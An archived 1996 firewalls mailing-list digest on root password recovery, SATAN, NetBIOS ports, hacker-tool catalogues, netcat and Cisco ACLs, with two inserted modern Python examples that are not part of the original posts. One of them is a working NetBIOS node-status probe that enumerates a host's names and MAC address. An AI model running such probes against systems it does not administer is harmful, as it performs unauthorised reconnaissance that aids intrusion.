Ian Blenke wrote: > Booting to CDROM would seem to be the most ideal solution. > You are right, of course. The first thing that came to my mind was when the exact same thing happened here on a machine without a CD-ROM reader. /Stefan -- _______________________________________________________ Stefan Berg ISDN Group of Sweden / Svenska InternetCentralen Phone: +46-8-667 7010 Fax: +46-8-667 0610 E-mail: stefan@sic.se WWW: http://www.isdn.se/ http://www.sic.se/ _______________________________________________________ Recursive; adj. 
see Recursive
From firewalls-owner Wed Jul 17 06:18:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA21425 for firewalls-outgoing; Wed, 17 Jul 1996 05:56:03 -0700 (PDT) Received: from alma.ipso.net (alma.ipso.net [194.159.46.162]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA21276 for ; Wed, 17 Jul 1996 05:55:34 -0700 (PDT) Received: from hostes.ipso.net (hostes.ipso.net [194.159.46.178]) by alma.ipso.net (8.7.5/IPSO 3.2.0) with SMTP id NAA05172 for ; Wed, 17 Jul 1996 13:52:24 +0100 (BST) Message-Id: <199607171252.NAA05172@alma.ipso.net> Comments: Authenticated sender is From: "Phil Askey" Organization: The IP Systems Operation To: firewalls@GreatCircle.COM Date: Wed, 17 Jul 1996 13:49:34 +0100 Subject: Re: [HELP] I lost root password! Reply-to: phil@ipso.net X-mailer: Pegasus Mail for Win32 (v2.41) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
: > Hello, : > This is a very urgent situation for me! : > Someone has broken my root password! And to make it worse, the file system : > is crashing now! : > : > I use Solaris 2.4; when I used SunOS 4.1.3 I could modify the root password : > by booting into single-user mode.. : > But whenever I try, it asks me for the root password.. : > : > Could you help me with this problem? How can I regain the root password? : > I know my asking for help is not suitable for this mailing list, but : > nobody can help me.. : > : > Anyway, thank you in advance.. : : You could remove and mount the disk on another Solaris machine, and modify the : password field in order to regain root access to the system. : Or easier still, just boot up on the Solaris CD, get a miniroot and mount the hard disk up in a temporary directory... Just a thought. 
Phil -- Phil Askey | mailto:phil@ipso.net Internet Consultant | http://phil.ipso.net Ybir lbh Freran | phone:+44 1223 570496 mobile: 0976 252877 The IP Systems Operation| smail:92 St Barnabas Rd, Cambridge CB1 2DE From firewalls-owner Wed Jul 17 06:44:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA22255 for firewalls-outgoing; Wed, 17 Jul 1996 06:09:54 -0700 (PDT) Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA22244 for ; Wed, 17 Jul 1996 06:09:47 -0700 (PDT) Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id PAA04200; Wed, 17 Jul 1996 15:04:40 +0200 (MET DST) X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh) MIME-Version: 1.0 Message-Id: <9607171506.AA57862@pamela.sic.se> Date: Wed, 17 Jul 1996 15:06:57 +0100 From: "Stefan Berg" To: "Moore, Mark" Cc: firewalls@GreatCircle.com Subject: Re: Satan Program Content-Type: Text/Plain; charset=US-ASCII Content-Disposition: Inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Mark, Try ftp://ftp.win.tue.nl/pub/security/index.html for more information. Best regards, Stefan -- _______________________________________________________ Stefan Berg ISDN Group of Sweden / Svenska InternetCentralen Phone: +46-8-667 7010 Fax: +46-8-667 0610 E-mail: stefan@sic.se WWW: http://www.isdn.se/ http://www.sic.se/ _______________________________________________________ Recursive; adj. 
see Recursive From firewalls-owner Wed Jul 17 06:52:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA23830 for firewalls-outgoing; Wed, 17 Jul 1996 06:47:01 -0700 (PDT) Received: from nova.unix.portal.com (nova.unix.portal.com [156.151.1.101]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA23823 for ; Wed, 17 Jul 1996 06:46:55 -0700 (PDT) Received: from jobe.shell.portal.com (jobe.shell.portal.com [156.151.3.4]) by nova.unix.portal.com (8.6.11/8.6.5) with ESMTP id GAA11147 for ; Wed, 17 Jul 1996 06:42:22 -0700 Received: (hfinney@localhost) by jobe.shell.portal.com (8.6.11/8.6.5) id GAA17570 for firewalls@greatcircle.com; Wed, 17 Jul 1996 06:42:21 -0700 Date: Wed, 17 Jul 1996 06:42:21 -0700 Message-Id: <199607171342.GAA17570@jobe.shell.portal.com> To: firewalls@greatcircle.com From: anonymous-remailer@shell.portal.com Subject: Re: Ports 137 & 138 Comments: This message is NOT from the person listed in the From Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 01:22 PM 7/15/96 -0700, you wrote: >I too am curious about port 137. > >My site has no inbound services, only outbound. > >Do some NT websites use port 137 to resolve names? My proxy >logs indicates that some hits on port 137 are in groups >of 3, some from websites. My perusal of denied 137 hits: [snip] NT attempts to use nb name services (udp port 137, unicast) to find out the NetBIOS name of a machine before it attempts reverse DNS in my experience. Those sites are prob. open for attack via NBT (NetBIOS over TCP/IP), although you have to know the NetBIOS name of the machine before it will respond to a NBT SMB query on tcp port 139. Use of port 137 by NT: Unicast UDP: what's your name? Broadcast UDP: here's my name. 
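The "what's your name?" exchange the anonymous poster describes, as an added example that is not part of the original post: it builds the unicast NetBIOS node-status query (question type 0x21, wildcard name) that NT sends to UDP port 137, and parses the node-status reply, which lists the host's NetBIOS names with their service suffixes, the group bit that marks workgroup or domain names, and the adapter's MAC address. The packet layout follows RFC 1002; the sample reply, the host name NTSERVER1, the workgroup and the MAC in it are constructed for the example. A host that answers this from the Internet is advertising exactly the name an attacker needs for the TCP port 139 session the poster mentions, which is the reason to block 137-139 at the firewall in both directions.

```python
"""Added example (not from the original posts): the unicast NetBIOS
node-status query NT sends to UDP/137 and a parser for the reply.
RFC 1002 packet layout; the sample response is constructed here and the
host, workgroup and MAC values in it are invented."""
import socket
import struct

NBSTAT = 0x0021      # node status (nbtstat -A) question/record type
CLASS_IN = 0x0001
NBNS_PORT = 137

# Well-known 16th-byte service suffixes seen in node-status replies.
SUFFIX = {0x00: "workstation/domain", 0x03: "messenger",
          0x1B: "domain master browser", 0x1D: "master browser",
          0x20: "file server"}


def encode_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encode a NetBIOS name (RFC 1001 14.1): 15 bytes of
    space-padded name plus the suffix byte, each nibble mapped to 'A'..'P',
    wrapped as one 32-character DNS-style label.  "*" is the wildcard used
    by node-status queries: '*' followed by fifteen NUL bytes."""
    if name == "*":
        raw = b"*" + b"\x00" * 15
    else:
        raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    label = bytearray()
    for b in raw:
        label.append(0x41 + (b >> 4))
        label.append(0x41 + (b & 0x0F))
    return bytes([len(label)]) + bytes(label) + b"\x00"


def build_node_status_query(txid: int) -> bytes:
    """12-byte header (one question, no recursion flags) + NBSTAT question."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name("*") + struct.pack("!HH", NBSTAT, CLASS_IN)


def parse_node_status_response(data: bytes):
    """Return ([(name, suffix, is_group), ...], unit_id) from a node-status
    response.  Names carrying the group bit (0x8000) are workgroups/domains;
    the rest are the host's own names.  unit_id is the adapter MAC."""
    _txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if not (flags & 0x8000) or an != 1:
        raise ValueError("not a node status response")
    off = 12
    if (data[off] & 0xC0) == 0xC0:      # compressed pointer back to the question name
        off += 2
    else:                               # full label: length, 32 chars, terminator
        off += 1 + data[off] + 1
    rtype, _rclass, _ttl, _rdlen = struct.unpack("!HHIH", data[off:off + 10])
    off += 10
    if rtype != NBSTAT:
        raise ValueError("unexpected record type 0x%04x" % rtype)
    num_names = data[off]
    off += 1
    names = []
    for _ in range(num_names):          # 18 bytes per entry: 16-byte name + flags
        raw = data[off:off + 16]
        nflags = struct.unpack("!H", data[off + 16:off + 18])[0]
        names.append((raw[:15].rstrip(b" ").decode("ascii", "replace"),
                      raw[15], bool(nflags & 0x8000)))
        off += 18
    unit_id = data[off:off + 6]         # first field of the STATISTICS block
    return names, unit_id


def query_host(host: str, timeout: float = 2.0):
    """Send the query to a host you are responsible for and parse its reply.
    Any reply at all shows UDP/137 is reachable through the firewall."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_query(0x1234), (host, NBNS_PORT))
        data, _ = s.recvfrom(1024)
    return parse_node_status_response(data)


def build_sample_response(txid: int) -> bytes:
    """Constructed reply from an imaginary NT server NTSERVER1 in WORKGROUP."""
    def entry(name, suffix, group=False):
        nflags = (0x8000 if group else 0) | 0x0400      # 0x0400 = name is ACTIVE
        return (name.encode("ascii").ljust(15, b" ") + bytes([suffix])
                + struct.pack("!H", nflags))
    rdata = (bytes([3]) + entry("NTSERVER1", 0x00) + entry("NTSERVER1", 0x20)
             + entry("WORKGROUP", 0x00, group=True)
             + b"\x00\xa0\x24\x12\x34\x56" + b"\x00" * 40)   # STATISTICS block
    header = struct.pack("!HHHHHH", txid, 0x8400, 0, 1, 0, 0)  # response, authoritative
    rr = encode_name("*") + struct.pack("!HHIH", NBSTAT, CLASS_IN, 0, len(rdata))
    return header + rr + rdata


if __name__ == "__main__":
    names, mac = parse_node_status_response(build_sample_response(0x1234))
    for name, suffix, group in names:
        print("%-15s <%02x> %-6s %s" % (name, suffix, "GROUP" if group else "UNIQUE",
                                        SUFFIX.get(suffix, "")))
    print("MAC", mac.hex())
```

The <20> entry is the file-server name a client puts in the session request on port 139; seeing it in a reply from an Internet-facing address is the finding to act on. query_host is for hosts you administer: sending this to other people's machines is a probe, not a diagnostic.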
From firewalls-owner Wed Jul 17 07:11:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA24021 for firewalls-outgoing; Wed, 17 Jul 1996 06:49:41 -0700 (PDT) Received: from stevep.dsdc.dla.mil (stevep.dsac.dla.mil [131.78.6.122]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA24012 for ; Wed, 17 Jul 1996 06:49:31 -0700 (PDT) Received: (from spayne@localhost) by stevep.dsdc.dla.mil (8.7.4/8.7.3) id JAA17173 for firewalls@greatcircle.com; Wed, 17 Jul 1996 09:42:04 -0400 (EDT) From: "Steven C. Payne" Message-Id: <199607171342.JAA17173@stevep.dsdc.dla.mil> Subject: programs hackers use To: firewalls@greatcircle.com Date: Wed, 17 Jul 1996 09:42:04 -0400 (EDT) X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
hi, I know this is gonna send up flags and maybe create grief, but I am working on compiling a list of things I find suspect on systems (hacker tools) as well as programs that are setuid, administrator privileges, and things equivalent to .netrc and .rhosts. I have quite a few already from hackers I have tracked in the past. (mostly unix) I am looking for things that show up from time to time like crack, etc. I would like anyone's input about what they have found, and a brief description of what it does. I would also like to test it if it's possible in a controlled env. I am not doing this on my own, I intend on getting our security folks in on this, and documenting our findings. Understand you can call one program many names, and I would point this out, for example: crack program to crack passwords kcarc AKA crack, program to crack passwords. I don't want this to be unix specific, NT specific, or TCP specific. I want it to be generic enough to be used as a "cookbook" for system security. 
I am also looking into subverting these "hacker tools" like using secure versions of net_progs like finger, stel, wrappers like tcpd, and smap, smapd and smrsh. Where firewalls fit in, turning off wide area mounts, disabling tftp, ip spoofing, etc. Programs to edit the registry in NT, ones that do denial of service and others. I would also like to cover anonymous ftp, the early apache server, portmapper and pcnfsd. I am looking for info on network programs and vulnerabilities and cures. I will compile the list and maybe put it somewhere we can all get it from, or individual mail whichever might be more secure. Or I can provide it to CERT. Is this something everyone would be interested in? Anyway, mail to nomore_hack @ my.site in this msg and if interest is good, I will let everyone know. If it's not good, I will let everyone know. I really just want to snapshot what to be suspicious of and why. NOTE: I know this group is for firewalls but this is also a security group and a great wealth of knowledge exists here. I don't want the voluminous amount of data each system admin has encountered over the years, I can produce that. I want something useful and to the point, and that's why I am posting here. I have looked on CERT's site and found nothing really that goes into detail about what I want, for obvious reasons. 
thanks spayne
From firewalls-owner Wed Jul 17 07:56:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA27091 for firewalls-outgoing; Wed, 17 Jul 1996 07:48:07 -0700 (PDT) Received: from poseidon ([200.10.251.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA27084 for ; Wed, 17 Jul 1996 07:47:59 -0700 (PDT) Received: from [146.21.1.236] by poseidon (AIX 3.2/UCB 5.64/4.03) Message-Id: <1.5.4.16.19960717144601.22cfe8b6@sii.cl> X-Sender: qsherman@sii.cl X-Mailer: Windows Eudora Light Version 1.5.4 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 17 Jul 1996 10:46:01 -0400 To: firewalls@GreatCircle.com From: Quentin Sherman Subject: BorderWare Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
Hi All, I have been on this mailing list for a couple of months, but I haven't heard anyone talk about "BorderWare" until now. Because our Internet provider is trying to sell us this software, I wish to get some comments about it. We have a private network which connects all our offices and we have an Internet link; we don't need any connections from outside to our inside hosts, but we need some telnet connections to the outside. Any help would be appreciated... 
------------------------------------------------------------- Quentin Sherman (Qi Xue) Network & Security Consultant Servicio de Impuestos Internos Working Phon: 56-2 6921371 Teatinos 120, Santiago, Chile Working Fax: 56-2 6921501 e-mail: qsherman@sii.cl WWW: http://www.sii.cl ------------------------------------------------------------- From firewalls-owner Wed Jul 17 08:18:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA28452 for firewalls-outgoing; Wed, 17 Jul 1996 08:15:38 -0700 (PDT) Received: from phoenix.iss.net (phoenix.iss.net [204.241.60.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA28444 for ; Wed, 17 Jul 1996 08:15:29 -0700 (PDT) Received: from alexf.iss.net (alexf.iss.net [204.241.60.153]) by phoenix.iss.net (8.6.13/8.6.12) with SMTP id LAA03336 for ; Wed, 17 Jul 1996 11:12:03 -0400 Message-Id: <199607171512.LAA03336@phoenix.iss.net> Comments: Authenticated sender is From: "Alex F" Organization: Internet Security Systems, Inc. To: firewalls@greatcircle.com Date: Wed, 17 Jul 1996 11:13:12 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Reply-to: alexf@iss.net X-mailer: Pegasus Mail for Win32 (v2.32a) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Can some on this list tell me about the Satan program ( i.e. what does it > actually do ? ). Also, are there other programs like Satan ? > > Regards, > > Mark Satan is basically a bunch of PERL scripts that can analyze your machine's security remotely. Other programs that are similar are Pingware NetProbe ISS's Internet Security Scanner Pingware is available from bellcore (try www.bellcore.com or do an Alta-Vista search). I do not know if the other companies allow for evaluation/demo downloads, but you can go to www.iss.net and download a fully functional evaluation copy of our scanner. 
The downloaded (free) version does the same checks as the commercial version, the only difference being that it will only scan "localhost." The scanner comes for a few different OSs (AIX, HP-UX, Linux, SunOS, Solaris-SPARC only). More info can be had on our website, including listings/explanations of the vulnerability checks and report examples, etc. Hope this helps, Alex F =-=-=-=-=-=-=-=-=-=-=-=-=- Alex F alexf@iss.net Marketing Specialist Internet Security Systems =-=-=-=-=-=-=-=-=-=-=-=-=-
From firewalls-owner Wed Jul 17 09:21:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA01131 for firewalls-outgoing; Wed, 17 Jul 1996 09:17:02 -0700 (PDT) Received: from nacg.trane.com (nacg.trane.com [198.80.4.199]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA01124 for ; Wed, 17 Jul 1996 09:16:56 -0700 (PDT) Received: by nacg.trane.com id AA11449 Message-Id: <199607171613.AA11449@nacg.trane.com> Received: by nacg.trane.com (Internal Mail Agent-1); From: "Norton, Dave" To: Firewalls-post Subject: SATAN 1.1.1 Avail? Date: Wed, 17 Jul 96 11:18:00 PDT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
I hear that the latest version of SATAN is 1.1.1, and that it is now available. Can anyone tell me where I can obtain it? Thanx... 
Dave Norton dnorton@trane.com From firewalls-owner Wed Jul 17 09:48:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA02698 for firewalls-outgoing; Wed, 17 Jul 1996 09:44:40 -0700 (PDT) Received: from phoenix.iss.net (phoenix.iss.net [204.241.60.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA02687 for ; Wed, 17 Jul 1996 09:44:33 -0700 (PDT) Received: from alexf.iss.net (alexf.iss.net [204.241.60.153]) by phoenix.iss.net (8.6.13/8.6.12) with SMTP id MAA04477; Wed, 17 Jul 1996 12:41:22 -0400 Message-Id: <199607171641.MAA04477@phoenix.iss.net> Comments: Authenticated sender is From: "Alex F" Organization: Internet Security Systems, Inc. To: firewalls@GreatCircle.COM, "Steven C. Payne" Date: Wed, 17 Jul 1996 12:42:30 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: programs hackers use Reply-to: alexf@iss.net X-mailer: Pegasus Mail for Win32 (v2.32a) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I am looking for info on network programs and vulnerabilities and cures. > I will compile the list and maybe put it somewhere we can all > get it from, or individual mail whichever might be more secure. > Or I can provide it to CERT. > Is this something everyone would be interested in? Visit the "Vulnerability Database" at our web page (www.iss.net). This is something that I work on when I have time (read very little), but I am actively trying to add more stuff every week. Some stuff is old, some is new. Might help, and check it out periodically as new stuff is added. 
Hope this helps some,

Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F                      alexf@iss.net
Marketing Specialist        Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-

From firewalls-owner Wed Jul 17 10:23:01 1996
From: dsulser@leosec.saic.com (David Sulser)
Date: Wed, 17 Jul 1996 13:12:56 -0400
To: firewalls@GreatCircle.com
Subject: Re: SATAN 1.1.1 Avail?

> I hear that the latest version of SATAN is 1.1.1, and that it is now
> available. Can anyone tell me where I can obtain it? Thanx...
> Dave Norton
> dnorton@trane.com

Try ftp://ftp.win.tue.nl/pub/security/

Regards,
David Sulser

From firewalls-owner Wed Jul 17 10:38:21 1996
From: Joe Beiter
Date: Wed, 17 Jul 1996 13:02:09 +0000
To: Firewalls@GreatCircle.COM
Subject: Netcat

Does anyone have any feelings on using netcat to create "pipes" through a
firewall situation to port in things like news? We are using two ciscos
with a dmz area between them.

:---==@==---==@==---==@==---:
Joseph Beiter       Hacking's just another word for nothing
jwb@cosmic.org      left to kludge.

From firewalls-owner Wed Jul 17 10:48:26 1996
From: "R.D. Contarino"
Date: Wed, 17 Jul 1996 19:28:58 METDST
To: dnorton@trane.com
Cc: firewalls@GreatCircle.COM
Subject: Re: SATAN 1.1.1 Avail?

> I hear that the latest version of SATAN is 1.1.1, and that it is now
> available. Can anyone tell me where I can obtain it? Thanx...
> Dave Norton
> dnorton@trane.com

Hi ... try at:

http://hpux.cs.utah.edu/hpux/Networking/Admin/satan-1.1.1.html

... or ... if you prefer, use altavista or something else to find what you
need. It will return more than 100 sites for a satan-1.1.1 query.

Bye.
--
R.D. Contarino
System Adm. Dpt. - Video On Line
Telecom Italia - Italy

From firewalls-owner Wed Jul 17 11:06:25 1996
From: Don Lewis
Date: Tue, 16 Jul 1996 22:16:18 -0700
To: Dave Roberts, Firewalls@GreatCircle.COM
Subject: Re: Dirty Dogs on AOL

On Jul 15, 12:25pm, Dave Roberts wrote:
} Subject: Re: Dirty Dogs on AOL
} On Sun, 14 Jul 1996, Dan Simoes wrote:
}
} > of problems caused by AOL users. I've found that mailing to
} > postmaster@aol.com gets good results in tracking abuses.

I've heard that abuse@aol.com is the proper place to report stuff like this.

} Oh really? Sorry to sound cynical, but I suppose that has nothing to do
} with your mailing address :)
}
} On another mailing list to which I subscribed, we were pounded with
} spams, at least one a day. Firstly, I mailed the postmaster, with a copy
} of the headers, and informed them of the problem. I heard nothing.
} After a week of spams, I mailed again, pointed out that we now had 7 of
} these, and asked *politely* if something could be done about it.

etc etc

Sounds like Krazy Kevin's magazine spams. Two of the lists I subscribe to
were getting hit for a while. The story that I heard was that KK would sign
up for an AOL account using a fake name, spam a bunch of mail lists, the
complaints would roll in, and AOL would cancel the account, but the damage
would already be done. Blame AOL's marketing for making this too easy.

I heard that AOL was "taking steps", and then the magazine spams stopped,
but I never heard what "steps" were taken.

--- Truck

From firewalls-owner Wed Jul 17 11:13:30 1996
From: mdr@vodka.sse.att.com
Date: Wed, 17 Jul 1996 12:13:43 -0400 (EDT)
To: allyn@allyn.com (Mark Allyn 206-860-9454)
Cc: mdr@vodka.sse.att.com, allyn@allyn.com, howzit@worldnet.att.net
Subject: Re: Extending Financial Applications And Protecting via a Firewall

Mark Allyn,

I'm trying to make sure that I understand all of this myself. So if I need
straightening out here and get it, I'll humbly lick my wounds :) Also, if I
came across as attacking your idea, I apologize. It's hard to control the
intonation of email. If I could write that one over it would say "Don't
forget about certificates! or else ..."

My understanding is that _unless_ server certificates are used SSL provides
confidentiality but does not prevent DNS spoofing attacks. The point is that
encryption alone does not solve the problem. Session hijacking is not a
problem at all with SSL; I was describing "man-in-the-middle", which requires
DNS spoofing or control of an intermediate network or host. It is similar to
session hijacking in that the "middle man" has the power to continue the
session after you close. Use of certificates has to be configured.

Again, session hijacking is not a problem with SSL; DNS spoofs are
preventable with server certificates.

I do not know of a good solution for the PC host security problem. And it is
growing daily. Java, ActiveX, plug-ins, shareware, data-borne viruses,
self-starting CD-ROM software.... I would like a B2 Windows NT. The Java VM
actually has some promise of helping here if they can ever get the
implementation tight. But if the OS could effectively encapsulate
applications, then the browser and downloadable programs would be safe to
run (Java VM included).

My worries are:

1) People will put too much trust in encryption without strong
   authentication, aka SSL w/o certificates.
2) Hackers will begin to target the home PC via trojan horses in
   downloadable content.
3) The PC host security problem will be ignored until internet commerce
   functionality is seriously overhanging its security foundation.

Problem #2 really bothers me. In some ways I feel safer with hackers reading
my every packet rather than _forcing_ them to attack at my PC or Server or
other end-point of encryption. Guess I'm paranoid. (But people really are
following me!)

Mark Riggins
Secure Systems Engineering
AT&T Bell Labs

From firewalls-owner Wed Jul 17 11:18:45 1996
From: Quentin Sherman
Date: Wed, 17 Jul 1996 13:16:09 -0400
To: firewalls@greatcircle.com
Subject: Re: Cisco ACL's

>Howdy
>
>can someone here please help me out with the following:
>
>I have a cisco4k with 2 serial ports, one ether.
>
>eth0 is Lan A
>ser0 is Lan B
>ser1 is the Internet line
>
>I want everyone on Lan A to be able to access Lan B, and
>everyone on Lan B to be able to access Lan A. (all ports)
>
>Secondly, I want the Internet server (proxy, etc) on Lan
>A a.b.c.15 to be able to access any machine on the Internet,
>and any machine on the Internet to access it.
>
>What do I need to do to the following access lists to make
>the above work?
>
>! allow Lan A access to Lan B
>access-list permit a.b.c.0 255.255.255.0 a.b.d.0 255.255.255.0
>! allow Lan B access to Lan A
>access-list permit a.b.d.0 255.255.255.0 a.b.c.0 255.255.255.0
>! allow sun1 (Internet server) access to Internet
>access-list permit a.b.c.15 255.255.255.? 0.0.0.0 0.0.0.0
>! allow Internet access to sun1
>access-list permit 0.0.0.0 0.0.0.0 a.b.c.15 255.255.255.?
>! deny everything else
>access-list deny 0.0.0.0 0.0.0.0 0.0.0.0 0.0.0.0
>

First, you need to check the software version of your cisco router; I'm not
sure all versions support the filter function.

Second, in my personal opinion, it's just a little bit dangerous to use
*one* router to connect your internal network and the Internet.

Third, when you build a filter (access-list), there is no *network mask*
(sometimes called subnet mask) such as "255.255.255.0". They are called
"source wildcard bits", so the access-list you defined should be:

! allow Lan A access to Lan B
access-list permit ip a.b.c.0 0.0.0.255 a.b.d.0 0.0.0.255
! allow Lan B access to Lan A
access-list permit ip a.b.d.0 0.0.0.255 a.b.c.0 0.0.0.255

Just take a look at ftp://ftp.greatcircle.com/pub/FAQ; I think that will be
helpful to you. They've got a sample filter there.

Fourth, if you want higher security for your internet host, you need to
build some more filters to deny some special ports from the outside, such
as telnet, etc.

Finally, you should build another filter to deny any access to your router
from the outside (internet), so you can be sure that no one can change the
configuration of your router from the outside. Here is an example:

! allow all stations in Lan A to access the router
access-list 1 permit a.b.c.0 0.0.0.255

If you have any other questions, please let me know.
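The wildcard-bit point made in the reply above, worked through as an added example (Python, not part of the original thread): a small matcher that converts subnet masks to Cisco wildcard bits, evaluates the corrected entries against sample traffic, and shows what the entries as first posted would actually have matched. The addresses 192.0.2.0/24, 198.51.100.0/24 and 192.0.2.15, the list number 101 and the sample flows are constructed stand-ins for a.b.c.0, a.b.d.0 and a.b.c.15.

```python
"""Evaluate Cisco-style IP access-list entries using wildcard bits.

Added example for the Cisco ACL thread; not code from the original post.
Constructed stand-ins: Lan A = 192.0.2.0/24 (a.b.c.0), Lan B = 198.51.100.0/24
(a.b.d.0), sun1 = 192.0.2.15 (a.b.c.15), extended list number 101.
"""
from dataclasses import dataclass
from ipaddress import IPv4Address


def to_int(dotted: str) -> int:
    return int(IPv4Address(dotted))


def netmask_to_wildcard(netmask: str) -> str:
    """Wildcard bits are the bitwise inverse of a subnet mask:
    255.255.255.0 -> 0.0.0.255, 255.255.255.255 (one host) -> 0.0.0.0."""
    return str(IPv4Address(0xFFFFFFFF ^ to_int(netmask)))


def wildcard_match(addr: str, base: str, wildcard: str) -> bool:
    """A wildcard bit of 1 means 'don't care'; 0 means 'must equal base'."""
    care = 0xFFFFFFFF ^ to_int(wildcard)
    return (to_int(addr) & care) == (to_int(base) & care)


@dataclass(frozen=True)
class Ace:
    action: str      # "permit" or "deny"
    src: str
    src_wild: str
    dst: str
    dst_wild: str


def parse_ace(line: str) -> Ace:
    """Parse one numbered extended entry with protocol 'ip'.
    Source/destination may be 'A.B.C.D wildcard', 'host A.B.C.D' or 'any'."""
    tok = line.split()
    if len(tok) < 6 or tok[0] != "access-list" or tok[3] != "ip":
        raise ValueError(f"unsupported entry: {line}")

    def take(rest):
        if rest[0] == "any":
            return "0.0.0.0", "255.255.255.255", rest[1:]
        if rest[0] == "host":
            return rest[1], "0.0.0.0", rest[2:]
        return rest[0], rest[1], rest[2:]

    src, src_wild, rest = take(tok[4:])
    dst, dst_wild, _ = take(rest)
    return Ace(tok[2], src, src_wild, dst, dst_wild)


def evaluate(acl: list, src: str, dst: str) -> str:
    """First matching entry wins; every access-list ends in an implicit deny."""
    for ace in acl:
        if wildcard_match(src, ace.src, ace.src_wild) and \
           wildcard_match(dst, ace.dst, ace.dst_wild):
            return ace.action
    return "deny"


# The poster's intent, written with wildcard bits as the reply explains.
CORRECTED_ACL = [parse_ace(l) for l in """
access-list 101 permit ip 192.0.2.0 0.0.0.255 198.51.100.0 0.0.0.255
access-list 101 permit ip 198.51.100.0 0.0.0.255 192.0.2.0 0.0.0.255
access-list 101 permit ip host 192.0.2.15 any
access-list 101 permit ip any host 192.0.2.15
access-list 101 deny ip any any
""".strip().splitlines()]

# The Lan A/Lan B lines as first posted, with the subnet mask typed in the
# wildcard position: 255.255.255.0 there means "only the last octet must match".
# (The two sun1 lines are left out because their mask was an unresolved "?".)
AS_POSTED_ACL = [
    Ace("permit", "192.0.2.0", "255.255.255.0", "198.51.100.0", "255.255.255.0"),
    Ace("permit", "198.51.100.0", "255.255.255.0", "192.0.2.0", "255.255.255.0"),
    Ace("deny", "0.0.0.0", "0.0.0.0", "0.0.0.0", "0.0.0.0"),  # matches only 0.0.0.0
]

SAMPLE_FLOWS = {                       # constructed (source, destination) pairs
    "lanA->lanB": ("192.0.2.7", "198.51.100.40"),
    "lanB->lanA": ("198.51.100.40", "192.0.2.7"),
    "sun1->internet": ("192.0.2.15", "203.0.113.9"),
    "internet->sun1": ("203.0.113.9", "192.0.2.15"),
    "internet->lanA-host": ("203.0.113.9", "192.0.2.7"),
    "last-octet-zero": ("10.20.30.0", "172.16.99.0"),
}


def decisions(acl: list) -> dict:
    """Run every sample flow through an access-list and collect the verdicts."""
    return {name: evaluate(acl, s, d) for name, (s, d) in SAMPLE_FLOWS.items()}


if __name__ == "__main__":
    for name, acl in (("corrected", CORRECTED_ACL), ("as posted", AS_POSTED_ACL)):
        print(name, decisions(acl))
```

With the masks typed as wildcards, the intended Lan A to Lan B traffic is denied while two unrelated networks match simply because both addresses end in .0.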
-------------------------------------------------------------
Quentin Sherman (Qi Xue)            Network & Security Consultant
Servicio de Impuestos Internos      Working Phone: 56-2 6921371
Teatinos 120, Santiago, Chile       Working Fax:   56-2 6921501
e-mail: qsherman@sii.cl             WWW: http://www.sii.cl
-------------------------------------------------------------

From firewalls-owner Wed Jul 17 11:37:34 1996
From: Bill Stout
Date: Wed, 17 Jul 1996 11:01:54 -0700
To: Firewalls@GreatCircle.COM
Subject: RC4-128bit encryption for Netscape available

You all probably know this by now, but yesterday Netscape announced
availability of downloadable RC4-128bit encryption Server and Browser
products to U.S. customers.

http://www.netscape.com/

Bill

<=======10========20========30========40========50========60========70========80
William B. Stout        | Major revelations:
Senior Systems Admin    | "All objects are part of a larger object."
Hitachi Data Systems    | "3 aware beings comprise a person; mind, body, spirit."
NT/UNIX/I-net/Routers   | "The secret of life: To be involved with 'creation'."
408-970-4822            | Infowar, Cyber-war, yes, 'they' are out to get you...
--------------------------------------------------------------------------------

